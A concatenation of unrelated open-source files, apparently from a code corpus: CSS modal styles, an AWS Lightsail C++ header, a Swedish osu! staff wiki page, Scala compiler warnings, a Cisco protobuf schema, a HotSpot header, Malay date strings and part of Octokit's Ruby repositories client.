}
textarea {
direction: ltr;
text-align: left;
}
.redactor-modal-footer button.redactor-button-unstyled {
float:left;
margin-left: 0;
}
}
.redactor-modal-header {
padding: 20px;
font-size: 18px;
line-height: 24px;
font-weight: bold;
color: #000;
border-bottom: 1px solid rgba(0, 0, 0, .05);
&:empty {
display: none;
}
}
.redactor-modal-body {
padding: 32px 48px;
padding-bottom: 40px;
}
.redactor-modal-footer {
padding: 24px;
border-top: 1px solid rgba(0, 0, 0, .05);
overflow: hidden;
& button {
margin-right: 4px;
}
& button.redactor-button-unstyled {
margin-right: 0;
float: right;
}
&:empty {
display: none;
}
}
.redactor-modal-tabs {
display: flex;
border-bottom: 2px solid rgba(0, 0, 0, .05);
margin-bottom: 1em;
& a {
font-size: 15px;
padding: 2px 0;
text-decoration: none;
color: rgba(0, 0, 0, .5);
border-bottom: 2px solid transparent;
margin-bottom: -2px;
margin-right: 14px;
}
& a:hover {
transition: all linear .2s;
}
& a:hover,
& a.active {
font-weight: 500;
color: #007dff;
border-bottom-color: #007dff;
}
} | {
"pile_set_name": "Github"
} |
/**
* Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
* SPDX-License-Identifier: Apache-2.0.
*/
#pragma once
#include <aws/lightsail/Lightsail_EXPORTS.h>
#include <aws/core/utils/memory/stl/AWSVector.h>
#include <aws/lightsail/model/Operation.h>
#include <utility>
namespace Aws
{
template<typename RESULT_TYPE>
class AmazonWebServiceResult;
namespace Utils
{
namespace Json
{
class JsonValue;
} // namespace Json
} // namespace Utils
namespace Lightsail
{
namespace Model
{
class AWS_LIGHTSAIL_API CreateDiskResult
{
public:
CreateDiskResult();
CreateDiskResult(const Aws::AmazonWebServiceResult<Aws::Utils::Json::JsonValue>& result);
CreateDiskResult& operator=(const Aws::AmazonWebServiceResult<Aws::Utils::Json::JsonValue>& result);
/**
* <p>An array of objects that describe the result of the action, such as the
* status of the request, the timestamp of the request, and the resources affected
* by the request.</p>
*/
inline const Aws::Vector<Operation>& GetOperations() const{ return m_operations; }
/**
* <p>An array of objects that describe the result of the action, such as the
* status of the request, the timestamp of the request, and the resources affected
* by the request.</p>
*/
inline void SetOperations(const Aws::Vector<Operation>& value) { m_operations = value; }
/**
* <p>An array of objects that describe the result of the action, such as the
* status of the request, the timestamp of the request, and the resources affected
* by the request.</p>
*/
inline void SetOperations(Aws::Vector<Operation>&& value) { m_operations = std::move(value); }
/**
* <p>An array of objects that describe the result of the action, such as the
* status of the request, the timestamp of the request, and the resources affected
* by the request.</p>
*/
inline CreateDiskResult& WithOperations(const Aws::Vector<Operation>& value) { SetOperations(value); return *this;}
/**
* <p>An array of objects that describe the result of the action, such as the
* status of the request, the timestamp of the request, and the resources affected
* by the request.</p>
*/
inline CreateDiskResult& WithOperations(Aws::Vector<Operation>&& value) { SetOperations(std::move(value)); return *this;}
/**
* <p>An array of objects that describe the result of the action, such as the
* status of the request, the timestamp of the request, and the resources affected
* by the request.</p>
*/
inline CreateDiskResult& AddOperations(const Operation& value) { m_operations.push_back(value); return *this; }
/**
* <p>An array of objects that describe the result of the action, such as the
* status of the request, the timestamp of the request, and the resources affected
* by the request.</p>
*/
inline CreateDiskResult& AddOperations(Operation&& value) { m_operations.push_back(std::move(value)); return *this; }
private:
Aws::Vector<Operation> m_operations;
};
} // namespace Model
} // namespace Lightsail
} // namespace Aws
| {
"pile_set_name": "Github"
} |
---
no_native_review: true
tags:
- osu! staff
- osu!team
- osu! team
- staff
- team osu!
---
# Teamet
*För en lista över befodranden och avgångar, se: [Personallogg](/wiki/Staff_Log)*
Personerna nedan är kärnan i **osu! teamet**och är främst ansvariga för att göra spelet fantastiskt för alla.
| Namn | Roll<!-- TODO: "Featured Artist outreach" isn't a role but I'm not sure how to write it as one... --> |
| :-- | :-- |
| ![][flag_AU] **[peppy](https://osu.ppy.sh/users/2)** | **Projektledare** |
| ![][flag_GB] [-Mo-](https://osu.ppy.sh/users/2202163) | Modding och mapping scenrådgivare |
| ![][flag_US] [Chaos](https://osu.ppy.sh/users/2628870) | Moderation och communityrådgivare |
| ![][flag_AU] [Ephemeral](https://osu.ppy.sh/users/102335) | Projekt- och communityunderhållare, Featured Artist outreach |
| ![][flag_JP] [flyte](https://osu.ppy.sh/users/3103765) | Designledare, bosatt Creative Cloud Watcher |
| ![][flag_GB] [JBHyperion](https://osu.ppy.sh/users/4879508) | Modding och mapping scenrådgivare |
| ![][flag_AR] [juankristal](https://osu.ppy.sh/users/443656) | VM-arrangör och administratör |
| ![][flag_DE] [Mao](https://osu.ppy.sh/users/2204515) | Modding och mapping scenrådgivare |
| ![][flag_JP] [nanaya](https://osu.ppy.sh/users/2387883) | osu!web utvecklare |
| ![][flag_PH] [Nathanael](https://osu.ppy.sh/users/2295078) | Allmän housekeeper, moderationsrådgivare |
| ![][flag_AU] [nekodex](https://osu.ppy.sh/users/102) | osu!web utvecklare, [officiell osu! Featured Artist](https://osu.ppy.sh/beatmaps/artists/1) |
| ![][flag_JP] [notbakaneko](https://osu.ppy.sh/users/10751776) | osu!web utvecklare |
| ![][flag_DE] [Okoratu](https://osu.ppy.sh/users/1623405) | Modding och mapping scenrådgivare |
| ![][flag_US] [pishifat](https://osu.ppy.sh/users/3178418) | Modding och mapping scenrådgivare, Mappers' Guild organiserare, Featured Artist outreach |
| ![][flag_MX] [Repflez](https://osu.ppy.sh/users/201392) | Allmän housekeeper, wiki underhållare |
| ![][flag_FR] [Shiro](https://osu.ppy.sh/users/113005) | Allmän housekeeper |
| ![][flag_AU] [smoogipoo](https://osu.ppy.sh/users/1040328) | osu! utvecklare, osu!mania älskare, bug buster |
| ![][flag_US] [Toy](https://osu.ppy.sh/users/2757689) | Project Loved ledare, communityrådgivare, Featured Artist outreach |
| ![][flag_ES] [Trosk-](https://osu.ppy.sh/users/3469385) | Allmän housekeeper, turneringsassistent |
| ![][flag_AU] [Zallius](https://osu.ppy.sh/users/55) | Utrotningshotade arter |
## Användargrupper
Följande är användargrupper som består av osu! communitymedlemmar som hjälper till att upprätthålla osu!. De flesta av dessa användargrupper kan kännas igenom sina forumfärger, chattfärger i spelet, profiltitlar och / eller profilbadges.
| Namn | Beskrivning |
| :-- | :-- |
| [Beatmap Nominators](Beatmap_Nominators) | Användare som jobbar hårt för att säkerställa att dina beatmaps blir qualified. |
| [Utvecklare](Developers) | Gör spelet fantastiskt genom att lägga till nya funktioner och fixa buggarna. |
| [Global Moderation Team](Global_Moderation_Team) | Håller koll på forumet och in-game chatten |
| [Nomination Assessment Team](Nomination_Assessment_Team) | Hanterar Beatmap-nominatorerna |
| [osu! Alumni](osu!_Alumni) | De kända för sina bidrag som sedan har gått vidare |
| [Project Loved Team](Project_Loved_Team) | Upptäcker och tar reda på beatmapsen som communityn älskar mest. |
| [Support Team](Support_Team) | Hjälp / Feature Request support |
## Inaktiva kärnteamsmedlemmar
| Name | Role |
| :-- | :-- |
| ![][flag_US] [awp](https://osu.ppy.sh/users/2650) | Allmän housekeeper och hjälpare, chibi artist. [Barrel Roll Weekly](http://brw.twinkfish.com/) |
| ![][flag_NO] [cYsmix](https://osu.ppy.sh/users/272870) | Ljuddesigner, [officiell osu! Featured Artist](https://osu.ppy.sh/beatmaps/artists/2) |
| ![][flag_NZ] [deadbeat](https://osu.ppy.sh/users/128370) | VM-arrangör och administratör |
| ![][flag_US] [Derekku](https://osu.ppy.sh/users/91341) | Allmän housekeeper, community manager |
| ![][flag_NZ] [Echo](https://osu.ppy.sh/users/431) | osu! utvecklare, leverantör av IRC-integration för chatt i spelet, webbplatsunderhållare. [Blogg](http://blog.echo.sh/) |
| ![][flag_US] [HappyStick](https://osu.ppy.sh/users/256802) | osu! Coffee Hour host, World Cup streamer, turneringsarrangör |
| ![][flag_NL] [Intermezzo](https://osu.ppy.sh/users/136842) | osu! utvecklare, leverantör av osz2 och p2p backend |
| ![][flag_US] Jim | Original sajtdesigner. [Brand New Games](http://www.bravegamer.com/) |
| ![][flag_DE] [Loctav](https://osu.ppy.sh/users/71366) | World Cup-arrangör och administratör, QAT-ledare, community manager |
| ![][flag_US] [LuigiHann](https://osu.ppy.sh/users/1079) | Epic skin designer, bidragare till default skinnet och ikonsättet. [DeviantArt](https://luigihann.deviantart.com/) |
| ![][flag_US] [mm201](https://osu.ppy.sh/users/30655) | osu! utvecklare, skaparen av mm sliders |
| ![][flag_US] [nuudles](https://osu.ppy.sh/users/21312) | osu! iPhone utvecklare |
| ![][flag_US] [Nyquill](https://osu.ppy.sh/users/682935) | osu! utvecklare, Mappers' Guild organiserare |
| ![][flag_US] Phil | Forumdesigner |
| ![][flag_US] [RBRat3](https://osu.ppy.sh/users/307202) | osu!painter, cool stuff maker-guy extraordinaire |
| ![][flag_US] [Sarumaru](https://osu.ppy.sh/users/9427) | Original Pippi-koncept och artworkdesigner. [DeviantArt](https://sarumaru.deviantart.com/) |
| ![][flag_GR] [Sinistro](https://osu.ppy.sh/users/5530) | Tidig community manager och ledare, mötesprotokoll och FAQ-bidragsgivare |
| ![][flag_DE] [Tom94](https://osu.ppy.sh/users/1857058) | osu! och pp utvecklare |
| ![][flag_CN] [woc2006](https://osu.ppy.sh/users/1105845) | osu! utvecklare, osu!mania mode utvecklare |
| ![][flag_JP] [yelle](https://osu.ppy.sh/users/4916903) | [osu!store](https://osu.ppy.sh/store/listing) ledare |
| ![][flag_US] [ztrot](https://osu.ppy.sh/users/6347) | [osu!academy](/wiki/osu!academy) professor, media- och karaktärdesigner |
[flag_AR]: /wiki/shared/flag/AR.gif "Argentina"
[flag_AU]: /wiki/shared/flag/AU.gif "Australia"
[flag_DE]: /wiki/shared/flag/DE.gif "Germany"
[flag_ES]: /wiki/shared/flag/ES.gif "Spain"
[flag_FR]: /wiki/shared/flag/FR.gif "France"
[flag_NZ]: /wiki/shared/flag/NZ.gif "New Zealand"
[flag_NL]: /wiki/shared/flag/NL.gif "Netherlands"
[flag_US]: /wiki/shared/flag/US.gif "United States"
[flag_NO]: /wiki/shared/flag/NO.gif "Norway"
[flag_PH]: /wiki/shared/flag/PH.gif "Philippines"
[flag_CN]: /wiki/shared/flag/CN.gif "China"
[flag_GR]: /wiki/shared/flag/GR.gif "Greece"
[flag_JP]: /wiki/shared/flag/JP.gif "Japan"
[flag_MX]: /wiki/shared/flag/MX.gif "Mexico"
[flag_GB]: /wiki/shared/flag/GB.gif "United Kingdom"
| {
"pile_set_name": "Github"
} |
unchecked2.scala:4: warning: fruitless type test: a value of type Some[List[Int]] cannot also be a Option[List[String]] (but still might match its erasure)
/* warn */ Some(List(1)).isInstanceOf[Option[List[String]]]
^
unchecked2.scala:5: warning: non-variable type argument Option[_] in type Option[Option[_]] is unchecked since it is eliminated by erasure
/* warn */ Some(123).isInstanceOf[Option[Option[_]]]
^
unchecked2.scala:6: warning: fruitless type test: a value of type Some[Int] cannot also be a Option[String] (but still might match its erasure)
/* warn */ Some(123).isInstanceOf[Option[String]]
^
unchecked2.scala:7: warning: fruitless type test: a value of type Some[Int] cannot also be a Option[List[String]] (but still might match its erasure)
/* warn */ Some(123).isInstanceOf[Option[List[String]]]
^
unchecked2.scala:8: warning: fruitless type test: a value of type Some[Int] cannot also be a Option[List[Int => String]] (but still might match its erasure)
/* warn */ Some(123).isInstanceOf[Option[List[Int => String]]]
^
unchecked2.scala:9: warning: fruitless type test: a value of type Some[Int] cannot also be a Option[(String, Double)] (but still might match its erasure)
/* warn */ Some(123).isInstanceOf[Option[(String, Double)]]
^
unchecked2.scala:10: warning: fruitless type test: a value of type Some[Int] cannot also be a Option[String => Double] (but still might match its erasure)
/* warn */ Some(123).isInstanceOf[Option[String => Double]]
^
unchecked2.scala:14: warning: non-variable type argument List[String] in type Option[List[String]] is unchecked since it is eliminated by erasure
/* warn */ (Some(List(1)): Any).isInstanceOf[Option[List[String]]]
^
unchecked2.scala:15: warning: non-variable type argument Int in type Option[Int] is unchecked since it is eliminated by erasure
/* warn */ (Some(123): Any).isInstanceOf[Option[Int]]
^
unchecked2.scala:16: warning: non-variable type argument String in type Option[String] is unchecked since it is eliminated by erasure
/* warn */ (Some(123): Any).isInstanceOf[Option[String]]
^
unchecked2.scala:17: warning: non-variable type argument List[String] in type Option[List[String]] is unchecked since it is eliminated by erasure
/* warn */ (Some(123): Any).isInstanceOf[Option[List[String]]]
^
unchecked2.scala:18: warning: non-variable type argument List[Int => String] in type Option[List[Int => String]] is unchecked since it is eliminated by erasure
/* warn */ (Some(123): Any).isInstanceOf[Option[List[Int => String]]]
^
unchecked2.scala:19: warning: non-variable type argument (String, Double) in type Option[(String, Double)] is unchecked since it is eliminated by erasure
/* warn */ (Some(123): Any).isInstanceOf[Option[(String, Double)]]
^
unchecked2.scala:20: warning: non-variable type argument String => Double in type Option[String => Double] is unchecked since it is eliminated by erasure
/* warn */ (Some(123): Any).isInstanceOf[Option[String => Double]]
^
error: No warnings can be incurred under -Xfatal-warnings.
14 warnings found
one error found
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2015, Cisco Systems
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
// 1. Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimer.
//
// 2. Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
//
// 3. Neither the name of the copyright holder nor the names of its
// contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
// TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
// PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
// EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
// PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
// PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
// LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
// NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
// SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// This file is autogenerated
//
// The following edits are possible, without affecting the validity of the
// file:
//
// * Fields may be renamed.
// * Fields may be deleted.
// * The unique numbered tag for a field may be changed, provided that
// the ordering of tags for fields within a message is preserved.
// * Message types may be renamed.
// * Message types may be deleted (if all fields that reference them
// have been deleted).
//
// All Cisco message and field extensions must be preserved (except when the
// field itself is being deleted).
syntax = "proto3";
package cisco_ios_xr_spirit_install_instmgr_oper.software_install.issu.inventory;
// ISSU Inventory Information all nodes
message isd_inv_info_container_KEYS {
}
message isd_inv_info_container {
repeated isd_inv_info_st invinfo = 50;
}
message isd_inv_info_st {
// Node ID
sint32 node_id = 1;
// Node Type
string node_type = 2;
// ISSU Node Role
string issu_node_role = 3;
// Node State
string node_state = 4;
// Node role
string node_role = 5;
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2005, 2010, Oracle and/or its affiliates. All rights reserved.
* Copyright (c) 2014, Red Hat Inc. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*
*/
#ifndef CPU_AARCH64_VM_C1_FPUSTACKSIM_HPP
#define CPU_AARCH64_VM_C1_FPUSTACKSIM_HPP
// No FPU stack on AARCH64
class FpuStackSim;
#endif // CPU_AARCH64_VM_C1_FPUSTACKSIM_HPP
| {
"pile_set_name": "Github"
} |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Day names
weekday-0-long = Ahad
weekday-1-long = Isnin
weekday-2-long = Selasa
weekday-3-long = Rabu
weekday-4-long = Khamis
weekday-5-long = Jumaat
weekday-6-long = Sabtu
weekday-0-short = Ahad
weekday-1-short = Isnin
weekday-2-short = Selasa
weekday-3-short = Rabu
weekday-4-short = Khamis
weekday-5-short = Jumaat
weekday-6-short = Sabtu
# Month names
month-0-long = Januari
month-1-long = Februari
month-2-long = Mac
month-3-long = April
month-4-long = Mei
month-5-long = Jun
month-6-long = Julai
month-7-long = Ogos
month-8-long = September
month-9-long = Oktober
month-10-long = November
month-11-long = Disember
month-0-genitive = Januari
month-1-genitive = Februari
month-2-genitive = Mac
month-3-genitive = April
month-4-genitive = Mei
month-5-genitive = Jun
month-6-genitive = Julai
month-7-genitive = Ogos
month-8-genitive = September
month-9-genitive = Oktober
month-10-genitive = November
month-11-genitive = Disember
month-0-short = Jan
month-1-short = Feb
month-2-short = Mac
month-3-short = Apr
month-4-short = Mei
month-5-short = Jun
month-6-short = Jul
month-7-short = Ogos
month-8-short = Sep
month-9-short = Okt
month-10-short = Nov
month-11-short = Dis
# Relative time ("pretty dates"), normal/long variant
minutes-ago-long={[ plural(value) ]}
minutes-ago-long[zero] = sebentar tadi
minutes-ago-long[one] = satu minit lalu
minutes-ago-long[two] = {{value}} minit lalu
minutes-ago-long[few] = {{value}} minit lalu
minutes-ago-long[many] = {{value}} minit lalu
minutes-ago-long[other] = {{value}} minit lalu
hours-ago-long={[ plural(value) ]}
hours-ago-long[zero] = sebentar tadi
hours-ago-long[one] = sejam yang lalu
hours-ago-long[two] = {{value}} jam lalu
hours-ago-long[few] = {{value}} jam lalu
hours-ago-long[many] = {{value}} jam lalu
hours-ago-long[other] = {{value}} jam lalu
days-ago-long={[ plural(value) ]}
days-ago-long[zero] = hari ini
days-ago-long[one] = semalam
days-ago-long[two] = {{value}} hari lalu
days-ago-long[few] = {{value}} hari lalu
days-ago-long[many] = {{value}} hari lalu
days-ago-long[other] = {{value}} hari lalu
weeks-ago-long={[ plural(value) ]}
weeks-ago-long[zero] = minggu ini
weeks-ago-long[one] = minggu lalu
weeks-ago-long[two] = {{value}} minggu lalu
weeks-ago-long[few] = {{value}} minggu lalu
weeks-ago-long[many] = {{value}} minggu lalu
weeks-ago-long[other] = {{value}} minggu lalu
months-ago-long={[ plural(value) ]}
months-ago-long[zero] = bulan ini
months-ago-long[one] = bulan lalu
months-ago-long[two] = {{value}} bulan lalu
months-ago-long[few] = {{value}} bulan lalu
months-ago-long[many] = {{value}} minit lalu
months-ago-long[other] = {{value}} minit lalu
years-ago-long={[ plural(value) ]}
years-ago-long[zero] = tahun ini
years-ago-long[one] = tahun lalu
years-ago-long[two] = {{value}} tahun lalu
years-ago-long[few] = {{value}} tahun lalu
years-ago-long[many] = {{value}} tahun lalu
years-ago-long[other] = {{value}} tahun lalu
minutes-until-long={[ plural(value) ]}
minutes-until-long[zero] = sekarang
minutes-until-long[one] = dalam satu minit
minutes-until-long[two] = dalam {{value}} minit
minutes-until-long[few] = dalam {{value}} minit
minutes-until-long[many] = dalam {{value}} minit
minutes-until-long[other] = dalam {{value}} minit
hours-until-long={[ plural(value) ]}
hours-until-long[zero] = sekarang
hours-until-long[one] = dalam satu jam
hours-until-long[two] = dalam {{value}} jam
hours-until-long[few] = dalam {{value}} jam
hours-until-long[many] = dalam {{value}} jam
hours-until-long[other] = dalam {{value}} jam
days-until-long={[ plural(value) ]}
days-until-long[zero] = hari ini
days-until-long[one] = esok
days-until-long[two] = dalam {{value}} hari
days-until-long[few] = dalam {{value}} hari
days-until-long[many] = dalam {{value}} hari
days-until-long[other] = dalam {{value}} hari
weeks-until-long={[ plural(value) ]}
weeks-until-long[zero] = minggu ini
weeks-until-long[one] = minggu depan
weeks-until-long[two] = dalam {{value}} minggu
weeks-until-long[few] = dalam {{value}} minggu
weeks-until-long[many] = dalam {{value}} minggu
weeks-until-long[other] = dalam {{value}} minggu
months-until-long={[ plural(value) ]}
months-until-long[zero] = bulan ini
months-until-long[one] = bulan depan
months-until-long[two] = dalam {{value}} bulan
months-until-long[few] = dalam {{value}} bulan
months-until-long[many] = dalam {{value}} bulan
months-until-long[other] = dalam {{value}} bulan
years-until-long={[ plural(value) ]}
years-until-long[zero] = tahun ini
years-until-long[one] = tahun depan
years-until-long[two] = dalam {{value}} tahun
years-until-long[few] = dalam {{value}} tahun
years-until-long[many] = dalam {{value}} tahun
years-until-long[other] = dalam {{value}} tahun
# Relative time ("pretty dates"), short variant
# LOCALIZATION NOTE: the time unit should be as short as possible,
# and the whole string should not exceed a length of ~10 latin characters.
# LOCALIZATION NOTE: the prime (’) can be used to represent minutes for most
# locales, but we use “m” instead for the English locale to prevent a possible
# confusion (35’ ago ≠ 35 feet ago).
minutes-ago-short={[ plural(value) ]}
minutes-ago-short[zero] = sebentar tadi
minutes-ago-short[other] = {{value}} minit lalu
hours-ago-short={[ plural(value) ]}
hours-ago-short[zero] = sebentar tadi
hours-ago-short[other] = {{value}} jam lalu
days-ago-short={[ plural(value) ]}
days-ago-short[zero] = hari ini
days-ago-short[other] = {{value}} hari lalu
minutes-until-short={[ plural(value) ]}
minutes-until-short[zero] = sekarang
minutes-until-short[other] = dalam {{value}} minit
hours-until-short={[ plural(value) ]}
hours-until-short[zero] = sekarang
hours-until-short[other] = dalam {{value}} jam
days-until-short={[ plural(value) ]}
days-until-short[zero] = hari ini
days-until-short[other] = dalam {{value}} hari
# Relative time ("pretty dates"), unexpected error
incorrectDate = (tarikh tidak betul)
# Date/Time format
# see http://pubs.opengroup.org/onlinepubs/007908799/xsh/strftime.html
dateTimeFormat_%c = %a %b %e %Y %I:%M:%S %p
dateTimeFormat_%x = %m/%d/%Y
dateTimeFormat_%X = %I:%M:%S %p
shortTimeFormat = %I:%M %p
shortDateTimeFormat = %x %I:%M %p
# Boolean to indicate if weekStarts on Monday (1) or Sunday (0).
weekStartsOnMonday = 0
# Localize “AM" and "PM" used in %p format for time
time_am = PG
time_pm = PTG
| {
"pile_set_name": "Github"
} |
module Octokit
class Client
# Methods for the Repositories API
#
# @see https://developer.github.com/v3/repos/
module Repositories
# Check if a repository exists
#
# @see https://developer.github.com/v3/repos/#get
# @param repo [Integer, String, Hash, Repository] A GitHub repository
# @return [Sawyer::Resource] if a repository exists, false otherwise
def repository?(repo, options = {})
!!repository(repo, options)
rescue Octokit::InvalidRepository
false
rescue Octokit::NotFound
false
end
# Get a single repository
#
# @see https://developer.github.com/v3/repos/#get
# @param repo [Integer, String, Hash, Repository] A GitHub repository
# @return [Sawyer::Resource] Repository information
def repository(repo, options = {})
get Repository.path(repo), options
end
alias :repo :repository
# Edit a repository
#
# @see https://developer.github.com/v3/repos/#edit
# @param repo [String, Hash, Repository] A GitHub repository
# @param options [Hash] Repository information to update
# @option options [String] :name Name of the repo
# @option options [String] :description Description of the repo
# @option options [String] :homepage Home page of the repo
# @option options [String] :private `true` makes the repository private, and `false` makes it public.
# @option options [String] :has_issues `true` enables issues for this repo, `false` disables issues.
# @option options [String] :has_wiki `true` enables wiki for this repo, `false` disables wiki.
# @option options [String] :has_downloads `true` enables downloads for this repo, `false` disables downloads.
# @option options [String] :default_branch Update the default branch for this repository.
# @return [Sawyer::Resource] Repository information
def edit_repository(repo, options = {})
repo = Repository.new(repo)
options[:name] ||= repo.name
patch "repos/#{repo}", options
end
alias :edit :edit_repository
alias :update_repository :edit_repository
alias :update :edit_repository
# List user repositories
#
# If user is not supplied, repositories for the current
# authenticated user are returned.
#
# @note If the user provided is a GitHub organization, only the
# organization's public repositories will be listed. For retrieving
# organization repositories the {Organizations#organization_repositories}
# method should be used instead.
# @see https://developer.github.com/v3/repos/#list-your-repositories
# @see https://developer.github.com/v3/repos/#list-user-repositories
# @param user [Integer, String] Optional GitHub user login or id for which
# to list repos.
# @return [Array<Sawyer::Resource>] List of repositories
def repositories(user=nil, options = {})
paginate "#{User.path user}/repos", options
end
alias :list_repositories :repositories
alias :list_repos :repositories
alias :repos :repositories
# List all repositories
#
# This provides a dump of every repository, in the order that they were
# created.
#
# @see https://developer.github.com/v3/repos/#list-all-public-repositories
#
# @param options [Hash] Optional options
# @option options [Integer] :since The integer ID of the last Repository
# that you’ve seen.
# @return [Array<Sawyer::Resource>] List of repositories.
def all_repositories(options = {})
paginate 'repositories', options
end
# Star a repository
#
# @param repo [String, Hash, Repository] A GitHub repository
# @return [Boolean] `true` if successfully starred
# @see https://developer.github.com/v3/activity/starring/#star-a-repository
def star(repo, options = {})
boolean_from_response :put, "user/starred/#{Repository.new(repo)}", options
end
# Unstar a repository
#
# @param repo [String, Hash, Repository] A GitHub repository
# @return [Boolean] `true` if successfully unstarred
# @see https://developer.github.com/v3/activity/starring/#unstar-a-repository
def unstar(repo, options = {})
boolean_from_response :delete, "user/starred/#{Repository.new(repo)}", options
end
# Watch a repository
#
# @param repo [String, Hash, Repository] A GitHub repository
# @return [Boolean] `true` if successfully watched
# @deprecated Use #star instead
# @see https://developer.github.com/v3/activity/watching/#watch-a-repository-legacy
def watch(repo, options = {})
boolean_from_response :put, "user/watched/#{Repository.new(repo)}", options
end
# Unwatch a repository
#
# @param repo [String, Hash, Repository] A GitHub repository
# @return [Boolean] `true` if successfully unwatched
# @deprecated Use #unstar instead
# @see https://developer.github.com/v3/activity/watching/#stop-watching-a-repository-legacy
def unwatch(repo, options = {})
boolean_from_response :delete, "user/watched/#{Repository.new(repo)}", options
end
# Fork a repository
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository
# @return [Sawyer::Resource] Repository info for the new fork
# @see https://developer.github.com/v3/repos/forks/#create-a-fork
def fork(repo, options = {})
post "#{Repository.path repo}/forks", options
end
# Create a repository for a user or organization
#
# @param name [String] Name of the new repo
# @option options [String] :description Description of the repo
# @option options [String] :homepage Home page of the repo
# @option options [String] :private `true` makes the repository private, and `false` makes it public.
# @option options [String] :has_issues `true` enables issues for this repo, `false` disables issues.
# @option options [String] :has_wiki `true` enables wiki for this repo, `false` disables wiki.
# @option options [String] :has_downloads `true` enables downloads for this repo, `false` disables downloads.
# @option options [String] :organization Short name for the org under which to create the repo.
# @option options [Integer] :team_id The id of the team that will be granted access to this repository. This is only valid when creating a repo in an organization.
# @option options [Boolean] :auto_init `true` to create an initial commit with empty README. Default is `false`.
# @option options [String] :gitignore_template Desired language or platform .gitignore template to apply. Ignored if auto_init parameter is not provided.
# @return [Sawyer::Resource] Repository info for the new repository
# @see https://developer.github.com/v3/repos/#create
def create_repository(name, options = {})
organization = options.delete :organization
options.merge! :name => name
if organization.nil?
post 'user/repos', options
else
post "#{Organization.path organization}/repos", options
end
end
alias :create_repo :create_repository
alias :create :create_repository
# Delete repository
#
# Note: If OAuth is used, 'delete_repo' scope is required
#
# @see https://developer.github.com/v3/repos/#delete-a-repository
# @param repo [Integer, String, Hash, Repository] A GitHub repository
# @return [Boolean] `true` if repository was deleted
def delete_repository(repo, options = {})
boolean_from_response :delete, Repository.path(repo), options
end
alias :delete_repo :delete_repository
# Hide a public repository
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository
# @return [Sawyer::Resource] Updated repository info
def set_private(repo, options = {})
# GitHub Api for setting private updated to use private attr, rather than public
update_repository repo, options.merge({ :private => true })
end
# Unhide a private repository
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository
# @return [Sawyer::Resource] Updated repository info
def set_public(repo, options = {})
# GitHub Api for setting private updated to use private attr, rather than public
update_repository repo, options.merge({ :private => false })
end
# Get deploy keys on a repo
#
# Requires authenticated client.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository
# @return [Array<Sawyer::Resource>] Array of hashes representing deploy keys.
# @see https://developer.github.com/v3/repos/keys/#list
# @example
# @client.deploy_keys('octokit/octokit.rb')
# @example
# @client.list_deploy_keys('octokit/octokit.rb')
def deploy_keys(repo, options = {})
paginate "#{Repository.path repo}/keys", options
end
alias :list_deploy_keys :deploy_keys
# Get a single deploy key for a repo
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param id [Integer] Deploy key ID.
# @return [Sawyer::Resource] Deploy key.
# @see https://developer.github.com/v3/repos/keys/#get
# @example
# @client.deploy_key('octokit/octokit.rb', 8675309)
def deploy_key(repo, id, options={})
get "#{Repository.path repo}/keys/#{id}", options
end
# Add deploy key to a repo
#
# Requires authenticated client.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param title [String] Title reference for the deploy key.
# @param key [String] Public key.
# @return [Sawyer::Resource] Hash representing newly added key.
# @see https://developer.github.com/v3/repos/keys/#create
# @example
# @client.add_deploy_key('octokit/octokit.rb', 'Staging server', 'ssh-rsa AAA...')
